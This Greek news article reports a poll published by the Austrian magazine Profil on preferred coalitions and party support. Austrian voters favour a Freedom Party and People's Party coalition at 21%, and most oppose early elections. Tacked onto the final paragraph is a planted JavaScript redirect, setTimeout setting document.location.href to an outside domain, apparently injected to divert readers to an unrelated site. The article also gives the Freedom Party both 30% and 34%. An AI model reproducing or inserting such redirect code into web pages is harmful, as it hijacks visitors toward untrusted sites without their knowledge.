Οι Αυστριακοί προτιμούν κυβερνητικό συνασπισμό Συντηρητικών με την Ακροδεξιά

0
5

 

Υπέρ ενός μελλοντικού κυβερνητικού συνασπισμού ανάμεσα στο ακροδεξιό εθνικιστικό Κόμμα των Ελευθέρων – που εμφανίζεται πλέον πρώτη πολιτική δύναμη με 30% – και στο συντηρητικό Λαϊκό Κόμμα, το οποίο βρίσκεται σε κυβέρνηση συνασπισμού, τάσσονται οι Αυστριακοί ψηφοφόροι.

Σύμφωνα με δημοσκόπηση, τα αποτελέσματα της οποίας δημοσιεύονται στο νέο τεύχος του αυστριακού περιοδικού «Προφίλ, μία μελλοντική κυβέρνηση του Κόμματος των Ελευθέρων και του Λαϊκού Κόμματος συγκεντρώνει το μεγαλύτερο ποσοστό προτίμησης των ερωτηθέντων, συγκεκριμένα 21%.

Το ενδεχόμενο τριμερούς συγκυβέρνησης Σοσιαλδημοκρατών με τους Πράσινους και το κόμμα ΝΕΟΣ συγκεντρώνει ποσοστό 14%, μόλις το 11% στηρίζει μία συνέχιση της έως τώρα κυβερνητικής συνεργασίας ανάμεσα στους Σοσιαλδημοκράτες και στο Λαϊκό Κόμμα, ενώ ακόμη χαμηλότερο είναι το ποσοστό, 8%, εκείνων που θα προτιμούσαν μία κυβερνητική συνεργασία των Σοσιαλδημοκρατών με το Κόμμα των Ελευθέρων.

Σύμφωνα και με την πρόσφατη δημοσκόπηση, σε περίπτωση εκλογών την ερχόμενη Κυριακή, το αντιπολιτευόμενο ακροδεξιό εθνικιστικό Κόμμα των Ελευθέρων θα συγκέντρωνε ποσοστό 34%.

Στην ίδια δημοσκόπηση οι Σοσιαλδημοκράτες θα βρίσκονταν στο 28%, το Λαϊκό Κόμμα θα συγκέντρωνε 18%, οι Πράσινοι 12% και το νεοφιλελεύθερο ΝΕΟΣ 6%.

Στην ίδια δημοσκόπηση, οι Αυστριακοί σε ποσοστό 51%, τάσσονται κατά της πρόωρης διεξαγωγής των επόμενων βουλευτικών εκλογών, και, παρά το γεγονός πως τρεις στους τέσσερις ερωτηθέντες (ποσοστό 74%) είναι «ελάχιστα» ή «δεν είναι καθόλου» ευχαριστημένοι με το έργο της αυστριακής κυβέρνησης, μόνον σε ποσοστό 33% υποστηρίζουν την επίσπευση των βουλευτικών εκλογών κατά έναν χρόνο και τη διεξαγωγή τους το φθινόπωρο του 2017. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here